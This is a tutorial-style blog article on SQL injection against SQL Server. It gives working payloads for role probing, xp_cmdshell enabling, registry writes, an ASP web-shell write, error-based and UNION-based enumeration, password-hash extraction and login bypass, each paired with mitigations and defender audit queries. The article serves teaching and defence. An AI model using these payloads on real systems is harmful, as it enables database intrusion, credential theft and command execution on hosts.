Fading Coder

One Final Commit for the Last Sprint


Exploiting SQL Server Extended Stored Procedures for Injection Attacks


Detecting SQL Server Database Type

To determine whether the back-end is SQL Server, check for the existence of the sysobjects system table, which holds metadata about every object in the database (since SQL Server 2005 it is a compatibility view over sys.objects, but it is still present). Append the probe to an injectable WHERE clause:

AND EXISTS (SELECT * FROM sysobjects)

If the page responds as it does for a true condition, the back-end is SQL Server. Other engines have no such table and answer with an error or an empty result. Sybase ASE, which shares SQL Server's ancestry, also has sysobjects; a follow-up probe on @@VERSION settles the difference.

Verifying Database Account Permissions

Use IS_SRVROLEMEMBER to test membership in a fixed server role and IS_MEMBER to test membership in a database role. Each returns 1 (member), 0 (not a member) or NULL (no such role exists at that level):

AND 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))  -- System administrator (server role)
AND 1=(SELECT IS_MEMBER('db_owner'))         -- Database owner (database role)
AND 1=(SELECT IS_MEMBER('public'))           -- Public role (database level, always 1)
  • sysadmin: Highest server-level privilege; if this returns 1 every other check is moot
  • db_owner: Full control over the current database only
  • public: Baseline permissions every login and user holds; a positive result carries no information

Note that IS_SRVROLEMEMBER('db_owner') returns NULL rather than 0, because db_owner is not a server role; a probe written that way never evaluates true, whatever rights the account holds.
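The probes above in the form they take once appended to a vulnerable query, plus the defender-side check that answers the same question from the other end. This is an added example, not code from the original page; the products table, its columns and the numeric ?id= injection point are assumed.

```sql
-- Added example (not from the original page). Assumed: the application builds
--   SELECT name, price FROM dbo.products WHERE id = <input>
-- Attacker input:  1 AND 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))
SELECT name, price FROM dbo.products
WHERE id = 1 AND 1 = (SELECT IS_SRVROLEMEMBER('sysadmin'));
-- Rows come back only when the application's login is sysadmin; otherwise the
-- page looks exactly like an unknown id. Every probe below works the same way.

-- Server roles are tested with IS_SRVROLEMEMBER, database roles with IS_MEMBER.
-- Each returns 1 (member), 0 (not a member) or NULL (no such role at that level).
SELECT IS_SRVROLEMEMBER('sysadmin')   AS is_sysadmin,
       IS_MEMBER('db_owner')          AS is_db_owner,
       IS_MEMBER('public')            AS is_public,     -- always 1 for a database user
       IS_SRVROLEMEMBER('db_owner')   AS wrong_level;   -- NULL: db_owner is not a server role

-- Time-based form for pages that echo nothing: a 5 second delay means "yes".
-- Attacker input:  1; IF IS_SRVROLEMEMBER('sysadmin') = 1 WAITFOR DELAY '00:00:05'--
SELECT name, price FROM dbo.products WHERE id = 1; IF IS_SRVROLEMEMBER('sysadmin') = 1 WAITFOR DELAY '00:00:05'--

-- Defender side: list the members of sysadmin and confirm the application's
-- login (SUSER_SNAME() inside the application's session) is not among them.
SELECT m.name AS login_name, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;
```

The stacked (semicolon) form only works where the driver sends the text as a batch, which the common SQL Server drivers do; the boolean form works everywhere the WHERE clause is reachable.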

Extended Stored Procedure Exploitation

SQL Server ships extended stored procedures (xp_*) in the master database that call out of the engine into the operating system. They run under the SQL Server service account, so an injection that reaches them inherits whatever that account can do on the host. Most of them are executable only by sysadmin unless an administrator has granted EXECUTE more widely.

xp_cmdshell

Executes operating system commands from the SQL Server process, under the service account's Windows identity:

EXEC master.dbo.xp_cmdshell 'dir C:\'

Mitigation:

  • Keep xp_cmdshell disabled; it is off by default since SQL Server 2005, and switching it on requires sp_configure, so an injection can only enable it if the application login is already sysadmin
  • Never grant EXECUTE on it to application logins; if a job genuinely needs it, configure a low-privilege proxy account with sp_xp_cmdshell_proxy_account so that commands do not run as the service account

xp_regwrite

Writes values to the Windows registry as the service account; under HKEY_LOCAL_MACHINE that is enough to add Run keys, change another service's parameters or alter SQL Server's own startup settings:

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Test', 'ValueName', 'REG_SZ', 'MaliciousData'

Mitigation:

  • Leave EXECUTE on xp_regwrite and xp_instance_regwrite with sysadmin only, and run the service under a low-privilege account so the registry ACLs bound what a compromised instance can write
  • Monitor registry value writes made by the sqlservr.exe process (Sysmon event ID 13 or equivalent); the SQL Server service has no business touching Run keys or other services' settings

sp_makewebtask (Removed)

sp_makewebtask belonged to the Web Assistant procedures that rendered query results into an HTML file. It was removed in SQL Server 2005, so it matters only for SQL Server 2000 and older instances that are still running. There, a sysadmin could write arbitrary content to any path the service account could reach, such as an ASP web shell into a web root:

EXEC sp_makewebtask @outputfile='C:\web\malicious.asp', @query='SELECT ''<%Execute("cmd")%>'''

Mitigation:

  • On legacy instances, drop the procedure or revoke EXECUTE from everything but sysadmin, and plan the upgrade
  • Keep the service account without write access to web roots and other directories served or executed by other software

Database Owner Privilege Exploitation

Even an account that holds only db_owner in the application database will probe the extended procedures in master, because the right to execute them is granted separately and is sometimes wider than intended. xp_regread is the usual first test: its EXECUTE permission has historically been granted to public (non-sysadmin callers are limited to a set of SQL Server related keys), so a successful call tells the attacker the procedure is reachable and which key paths it may read:

EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services', 'ServiceName'

The key path and value name are placeholders; a real probe reads keys whose contents describe the host (installed services, the instance's own configuration). db_owner by itself grants none of this, so a positive result means an administrator extended EXECUTE on master's procedures to public or to the application's login.

Mitigation:

  • Apply least privilege: the application login should hold only the database permissions it needs, never db_owner, and no EXECUTE on master's extended procedures
  • Audit and alert on executions of xp_* and sp_OA* procedures (SQL Server Audit or Extended Events); an application login calling them is a compromise indicator, not noise
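The attacker's stacked request for the xp_cmdshell section above, followed by the audit and remediation a DBA would run for all three procedure families (xp_cmdshell, the registry procedures and the OLE automation procedures). This is an added example, not code from the original page; the object and configuration names are SQL Server's own, while the numeric ?id=1 injection point is assumed.

```sql
-- Added example (not from the original page). Attacker side first, then the
-- audit and remediation a DBA would run. The injection point (a numeric id in
-- the WHERE clause) is assumed; the procedure and option names are real.

-- xp_cmdshell is off by default on SQL Server 2005+, so a sysadmin-level
-- injection re-enables it in the same stacked request before using it:
--   1; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
--      EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
--      EXEC master.dbo.xp_cmdshell 'whoami'--
-- The command's output is a result set the page will rarely render; attackers
-- park it in a table and read it back through a UNION or error-based channel.

-- Defender 1: are the command-execution features currently enabled?
SELECT name, CONVERT(int, value_in_use) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'show advanced options');

-- Defender 2: who holds EXECUTE on the dangerous procedures in master?
-- Anything granted to public or to an application login is a finding.
USE master;
SELECT o.name AS procedure_name,
       USER_NAME(p.grantee_principal_id) AS grantee,
       p.state_desc
FROM sys.database_permissions AS p
JOIN sys.all_objects AS o ON o.object_id = p.major_id
WHERE p.class = 1                       -- object-level permission
  AND p.permission_name = 'EXECUTE'
  AND o.name IN ('xp_cmdshell', 'xp_regread', 'xp_regwrite',
                 'xp_instance_regread', 'xp_instance_regwrite',
                 'xp_dirtree', 'xp_fileexist', 'sp_OACreate', 'sp_OAMethod')
ORDER BY o.name, grantee;

-- Defender 3: disable the features and remove any over-broad grant found above.
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
-- Run only for grants the audit actually listed; defaults differ by version:
-- REVOKE EXECUTE ON dbo.xp_regread FROM public;
```

The audit query is worth scheduling: a grant to public on one of these procedures is rarely made deliberately and, once present, turns any injection in any database on the instance into host access.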

SQL Injection Techniques for Database Enumeration

Using GROUP BY and HAVING Clauses

SQL Server refuses to run a query whose SELECT list contains columns that are neither aggregated nor listed in GROUP BY, and the error message names the offending column. Injecting HAVING 1=1 with no GROUP BY therefore leaks the first column of the SELECT list; adding that column to an injected GROUP BY leaks the next one, and so on until the query runs clean. The form for testing a guessed column name directly is:

SELECT col FROM tbl GROUP BY col HAVING col='guessed_name'

Both variants depend on the application relaying the engine's error text to the client.

Mitigation:

  • Use parameterized queries so input never becomes part of the clause structure
  • Return generic error messages; the enumeration lives entirely in the error text

ORDER BY with Type Conversion Errors

ORDER BY supports two error-driven probes. An integer position past the last column raises "The ORDER BY position number ... is out of range", which yields the column count, and a name that does not exist raises "Invalid column name", which confirms or rejects a guess:

SELECT * FROM users ORDER BY guessed_column

Type-conversion errors go further and leak data rather than structure: forcing SQL Server to convert a string to int with CONVERT or CAST produces an error that quotes the string that failed, so a subquery returning a table name or a password hash in that position prints the value inside the error message.

Mitigation:

  • Validate ORDER BY input against a fixed allowlist of column names; a sort column cannot be passed as a query parameter, so the allowlist is the only safe construction
  • Return generic error pages and keep the real message in server-side logs
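The two error-based techniques above (HAVING/GROUP BY column walking and the ORDER BY and conversion probes) carried through against one assumed target, with the error text SQL Server actually returns. This is an added example, not code from the original page; the products table and its three columns are assumed, and the page is assumed to echo database errors.

```sql
-- Added example (not from the original page). Assumed: the application builds
--   SELECT id, name, price FROM products WHERE name = '<input>'
-- and relays database error messages to the client.

-- Step 1: HAVING without GROUP BY makes SQL Server name the first column.
-- Input:  ' HAVING 1=1--
SELECT id, name, price FROM products WHERE name = '' HAVING 1=1--'
-- Msg 8120: Column 'products.id' is invalid in the select list because it is
-- not contained in either an aggregate function or the GROUP BY clause.

-- Step 2: add the learned column to GROUP BY; the error names the next one.
-- Repeat until the query succeeds, which means every column is known.
-- Input:  ' GROUP BY id HAVING 1=1--
SELECT id, name, price FROM products WHERE name = '' GROUP BY id HAVING 1=1--'
-- Msg 8120: Column 'products.name' is invalid in the select list ...
-- Input:  ' GROUP BY id, name HAVING 1=1--      -> names 'products.price'
-- Input:  ' GROUP BY id, name, price HAVING 1=1-- -> no error: three columns

-- Step 3: ORDER BY counts columns and confirms guessed names.
-- Input:  ' ORDER BY 3--     -> runs clean
-- Input:  ' ORDER BY 4--     -> Msg 108: The ORDER BY position number 4 is out
--                               of range of the number of items in the select list.
-- Input:  ' ORDER BY email-- -> Msg 207: Invalid column name 'email'.

-- Step 4: a conversion error leaks data, not just structure. SQL Server quotes
-- the string it failed to convert.
-- Input:  ' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sys.objects WHERE type='U' ORDER BY name))--
SELECT id, name, price FROM products WHERE name = ''
  AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sys.objects WHERE type = 'U' ORDER BY name))--'
-- Msg 245: Conversion failed when converting the nvarchar value 'accounts' to data type int.

-- Walk to the next table by excluding the names already seen; the same shape
-- with a different subquery pulls column names or the rows of any table.
SELECT id, name, price FROM products WHERE name = ''
  AND 1 = CONVERT(int, (SELECT TOP 1 name FROM sys.objects
                        WHERE type = 'U' AND name NOT IN ('accounts') ORDER BY name))--'
```

Every step here is a single request that either errors or does not, so the whole enumeration is cheap to script; the only thing that stops it is not returning the message text, which is the reason for the generic-error mitigation above.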

INFORMATION_SCHEMA Queries

In SQL Server, INFORMATION_SCHEMA.TABLES carries the database name in TABLE_CATALOG and the schema (normally dbo) in TABLE_SCHEMA; a filter of TABLE_SCHEMA='target_db' matches nothing. The views also cover only the current database, so another database is addressed by qualifying the view name:

SELECT TABLE_NAME FROM target_db.INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='dbo'

Mitigation:

  • INFORMATION_SCHEMA cannot be locked down on its own; it already shows a principal only the objects on which it holds some permission, so the effective control is the login's permission set
  • Grant the application login permissions on exactly the tables and procedures it uses; objects it cannot touch are invisible to it in these views, whereas db_owner or VIEW DEFINITION would make everything visible again
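The catalog/schema distinction and the permission filtering described above, demonstrated on a throwaway database user. This is an added example, not code from the original page; the two tables and the app_ro user are assumed names created and dropped by the script itself.

```sql
-- Added example (not from the original page). Table and user names are assumed.

-- TABLE_CATALOG is the database, TABLE_SCHEMA the schema. Filtering by the
-- current database and base tables only:
SELECT TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_CATALOG = DB_NAME() AND TABLE_TYPE = 'BASE TABLE';

-- Column names and types of one table: what an attacker needs before a UNION.
SELECT COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_SCHEMA = 'dbo' AND TABLE_NAME = 'accounts'
ORDER BY ORDINAL_POSITION;

-- The views are permission-filtered: a principal sees only objects on which it
-- holds some permission. Demonstration with a user that has SELECT on one table.
CREATE TABLE dbo.accounts (id INT, username NVARCHAR(50), pwd_hash VARBINARY(64));
CREATE TABLE dbo.products (id INT, name NVARCHAR(50), price MONEY);
CREATE USER app_ro WITHOUT LOGIN;
GRANT SELECT ON dbo.products TO app_ro;

EXECUTE AS USER = 'app_ro';
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'dbo';
-- Returns only 'products'. accounts is invisible to app_ro, so an injection
-- running as app_ro cannot discover it through INFORMATION_SCHEMA.
REVERT;

-- The same query as a db_owner member would list both tables; that is what the
-- least-privilege advice above is protecting.

-- Cleanup
DROP USER app_ro;
DROP TABLE dbo.accounts;
DROP TABLE dbo.products;
```

EXECUTE AS USER needs IMPERSONATE permission on the target user, which a database owner has; run the demonstration as the owner of a scratch database rather than in production.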

UNION SELECT Injection

UNION SELECT appends an attacker-chosen result set to the application's, so rows from any table the login can read are rendered by the page:

SELECT id FROM products WHERE category='input' UNION SELECT username FROM users

SQL Server requires both sides to have the same number of columns with compatible types; the attacker first finds the count (ORDER BY n, or adding NULLs until the error stops), then puts the text in a column the page actually displays.

Mitigation:

  • Use parameterized statements; a quote inside a parameter value is data, not syntax
  • Validate input thoroughly, with allowlists for anything that has to be placed into the query text itself

Password Hash Extraction

Once table and column names are known, credential data is read directly (the names here are placeholders):

SELECT pwd_hash FROM accounts WHERE username='admin'

Mitigation:

  • Store only slow, salted password hashes (bcrypt, scrypt or Argon2); these formats embed their salt, so no separate salting step is needed
  • Never store plaintext or reversibly encrypted passwords; a leaked table should cost the attacker a brute-force run per password, not immediate access

Classic SQL Injection Payloads

Universal Authentication Bypass

' OR '1'='1

When injected into the password field of authentication logic, the query becomes:

SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

AND binds tighter than OR, so the condition is evaluated as (username='admin' AND password='') OR '1'='1', which is true for every row; the application logs the attacker in as whichever row it reads first. The payload ends without a closing quote because the application's own closing quote completes the final '1'.

Limited Result Injection

a' OR 1=1 ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY--

This returns only the first matching record while bypassing authentication, which matters when the login code fails on multiple rows. The commonly quoted form a' OR 1=1 LIMIT 0,1-- is MySQL: LIMIT is not T-SQL and is a syntax error on SQL Server, where TOP sits before the select list and cannot be reached from the WHERE clause, so OFFSET ... FETCH (SQL Server 2012 and later) is the equivalent.
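The bypass and the single-row variant above, run through a login procedure that builds its query by concatenation, next to the same procedure written with real parameters (the prevention the page recommends). This is an added example, not code from the original page; the users table, its two sample rows and both procedure names are assumed, and passwords are kept in plaintext only to keep the demonstration short.

```sql
-- Added example (not from the original page). Schema, rows and names assumed.
-- Passwords are plaintext here purely for brevity; real systems store hashes.
CREATE TABLE dbo.users (id INT IDENTITY PRIMARY KEY, username NVARCHAR(50), password NVARCHAR(100));
INSERT INTO dbo.users (username, password) VALUES ('admin', 'hunter2'), ('alice', 's3cret');
GO

-- Vulnerable: input is concatenated into dynamic SQL. A password of
-- ' OR '1'='1 turns the WHERE into (username='admin' AND password='') OR '1'='1'.
CREATE PROCEDURE dbo.login_vulnerable @u NVARCHAR(100), @p NVARCHAR(100) AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT id, username FROM dbo.users WHERE username = ''' + @u +
        N''' AND password = ''' + @p + N'''';
    EXEC sp_executesql @sql;
END
GO

-- Hardened: the same query with parameters. The quote is data, not syntax,
-- and the plan is the same for every input.
CREATE PROCEDURE dbo.login_safe @u NVARCHAR(100), @p NVARCHAR(100) AS
BEGIN
    EXEC sp_executesql
        N'SELECT id, username FROM dbo.users WHERE username = @u AND password = @p',
        N'@u NVARCHAR(100), @p NVARCHAR(100)',
        @u = @u, @p = @p;
END
GO

-- Universal bypass: the vulnerable procedure returns both rows, the safe one none.
EXEC dbo.login_vulnerable @u = 'admin', @p = ''' OR ''1''=''1';
EXEC dbo.login_safe       @u = 'admin', @p = ''' OR ''1''=''1';

-- Single-row variant for login code that errors on multiple rows. SQL Server has
-- no LIMIT; OFFSET/FETCH is reachable from the WHERE clause, TOP is not.
EXEC dbo.login_vulnerable @u = 'admin',
     @p = ''' OR 1=1 ORDER BY id OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY--';
-- returns only id 1 (admin); the trailing quote is commented out by --

-- Cleanup
DROP PROCEDURE dbo.login_vulnerable;
DROP PROCEDURE dbo.login_safe;
DROP TABLE dbo.users;
```

The hardened version is not "escaping": nothing in the input is rewritten, the value simply never becomes part of the statement text. That is the property to look for in application code as well, whatever driver it uses.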

Database Information Extraction

1' UNION SELECT 1,CONCAT_WS(CHAR(58),SYSTEM_USER,DB_NAME(),@@VERSION)--

Returns the login name, the current database and the version string separated by colons (CHAR(58)). USER() is a MySQL function and fails on SQL Server; SYSTEM_USER gives the login, CURRENT_USER or USER_NAME() the database user. CONCAT_WS exists on SQL Server 2017 and later; on older versions concatenate with + and CAST the pieces to varchar. The leading 1 only pads the column count, which must match the vulnerable query's.

Extended System Information

' UNION SELECT 1,CONCAT_WS(':',CURRENT_USER,DB_NAME(),@@VERSION,@@SERVERNAME,@@LANGUAGE)--

Gathers the database user, current database, version, server (host\instance) name and session language in one row. DATABASE() is MySQL; DB_NAME() is the SQL Server equivalent.

Schema Enumeration

' UNION SELECT 1,TABLE_NAME FROM target_db.INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='dbo'--

Lists the tables in the dbo schema of the named database (drop the qualifier for the current one). The # comment marker is MySQL; T-SQL uses -- or /* */. The page has to render multiple rows for this to show everything at once; otherwise the rows are walked one per request with TOP 1 and a NOT IN list of names already seen.
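The UNION-based sequence from the UNION SELECT section and the three payloads above, carried through in T-SQL against one assumed target: column count, a displayable column, server facts, table and column names, and finally the hashes. This is an added example, not code from the original page; the products and accounts tables and their columns are assumed.

```sql
-- Added example (not from the original page). Assumed: the application builds
--   SELECT id, name FROM products WHERE category = '<input>'
-- and renders every row it gets back. Table and column names are assumed.

-- Step 1: find the column count. The UNION must match it exactly.
-- Input:  ' UNION SELECT NULL--
--   Msg 205: All queries combined using a UNION, INTERSECT or EXCEPT operator
--   must have an equal number of expressions in their target lists.
-- Input:  ' UNION SELECT NULL,NULL--      -> runs: two columns

-- Step 2: find a column that displays text (an int column would raise a
-- conversion error, which itself leaks the string).
-- Input:  ' UNION SELECT NULL,'abc'--

-- Step 3: server facts, using SQL Server functions. USER(), DATABASE(), LIMIT
-- and # are MySQL and fail here.
-- Input:  ' UNION SELECT NULL, SYSTEM_USER + ':' + DB_NAME() + ':' + @@SERVERNAME + ':' + @@VERSION--
SELECT id, name FROM products WHERE category = ''
UNION SELECT NULL, SYSTEM_USER + ':' + DB_NAME() + ':' + @@SERVERNAME + ':' + @@VERSION--'
-- CONCAT_WS(':', ...) does the same on 2017+ and skips NULL parts; with + a
-- single NULL operand makes the whole string NULL.

-- Step 4: tables of the current database, all at once when the page lists rows:
SELECT id, name FROM products WHERE category = ''
UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG = DB_NAME()--'
-- ...or one per request when it shows a single row, walking with TOP 1 / NOT IN:
SELECT id, name FROM products WHERE category = ''
UNION SELECT NULL, (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
                    WHERE TABLE_NAME NOT IN ('products') ORDER BY TABLE_NAME)--'

-- Step 5: columns of the interesting table, then its contents.
SELECT id, name FROM products WHERE category = ''
UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'accounts'--'
SELECT id, name FROM products WHERE category = ''
UNION SELECT NULL, username + ':' + CONVERT(varchar(128), pwd_hash, 1) FROM accounts--'
-- CONVERT(..., 1) renders a varbinary hash as 0x-prefixed hex so it survives
-- the string column; a varchar hash column needs no conversion.
```

Each statement shows the complete query as the server sees it, with the application's closing quote neutralised by the trailing comment; what the attacker actually types is only the part after the opening quote.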

Prevention Strategies

  1. Parameterized Queries: Use prepared statements or sp_executesql with parameters; never concatenate input into query text, including inside stored procedures
  2. Input Validation: Allowlist anything that cannot be parameterized (sort columns, table names); reject input that fails rather than trying to sanitize it
  3. Least Privilege: One login per application, holding only the object permissions it needs; no db_owner, no sysadmin, no EXECUTE on master's extended procedures
  4. Regular Updates: Apply security patches to the engine and the client drivers promptly
  5. Multi-Factor Authentication: Require it for administrative access to the instance and its host, so a stolen DBA credential alone is not enough
  6. Error Handling: Return generic messages to clients and keep the engine's text in server-side logs; error-based enumeration depends on that text
  7. Web Application Firewalls: Deploy a WAF as a detection layer that catches known payload shapes and buys time, not as a substitute for fixing the query
  8. Code Review: Audit every place query text is assembled, including dynamic SQL built inside the database itself
Tags: SQL Server
